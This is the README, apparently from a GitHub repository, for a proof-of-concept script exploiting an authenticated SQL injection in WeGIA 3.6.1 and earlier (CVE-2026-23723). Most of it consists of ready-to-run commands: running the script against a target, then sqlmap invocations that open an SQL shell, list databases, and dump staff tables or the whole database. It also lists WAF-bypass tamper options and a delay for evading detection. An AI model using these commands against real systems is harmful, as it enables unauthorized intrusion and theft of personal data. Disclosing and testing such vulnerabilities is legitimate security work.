
这是一个轻量级 Python 辅助脚本,旨在自动生成与 sqlmap 兼容的 PoC 文件,用于 WeGIA(≤ 3.6.1)中经身份验证的基于错误的 SQL 注入漏洞,该漏洞编号为 GHSA-xfmp-2hf9-gfjp。
WeGIA ≤ 3.6.1 中的认证错误型 SQL 注入
GHSA-xfmp-2hf9-gfjp | 官方公告
PoC 原作者 / 报告者:ViniCastro2001 GHSA 发布者:nilsonLazarin(项目维护者)
这个轻量级 Python 脚本可自动化执行:
id_memorando=1*)--sql-shell)requests 库(大多数渗透测试环境已预装)git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC
# 推荐:交互式密码提示
python CVE-2026-23723.py --url http://target.com -u admin
# 直接提供密码
python CVE-2026-23723.py --url http://target.com -u admin -p wegia
# 自定义输出文件
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req
成功运行后,脚本将:
尝试登录 生成 wegia_sqlmap.req(或您的自定义文件名) 显示可直接使用的 sqlmap 命令
# 1. 交互式 MySQL 风格 Shell(最推荐)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb
# 2. 显示当前数据库及所有数据库
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch
# 3. 列出 wegia 数据库中的表
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch
# 4. 导出特定表(示例:funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch
# 5. 导出整个 wegia 数据库(请谨慎操作!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
可选的 sqlmap 参数:
--proxy=http://127.0.0.1:8080(通过 Burp/ZAP 代理)
--tamper=space2comment,randomcase(基础 WAF 绕过)
--delay=1(降低速度以避免被检测)
如果自动登录失败 通过浏览器手动登录 → 复制完整的 Cookie 请求头 → 直接运行 sqlmap:
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
--cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
--sql-shell --batch
法律免责声明 本 PoC 仅供教育和授权渗透测试使用。 未经授权对任何系统使用均属违法行为,且被严格禁止。 作者及贡献者不对任何滥用行为或造成的损害承担责任。 参考资料
GHSA-xfmp-2hf9-gfjp CVE-2026-23723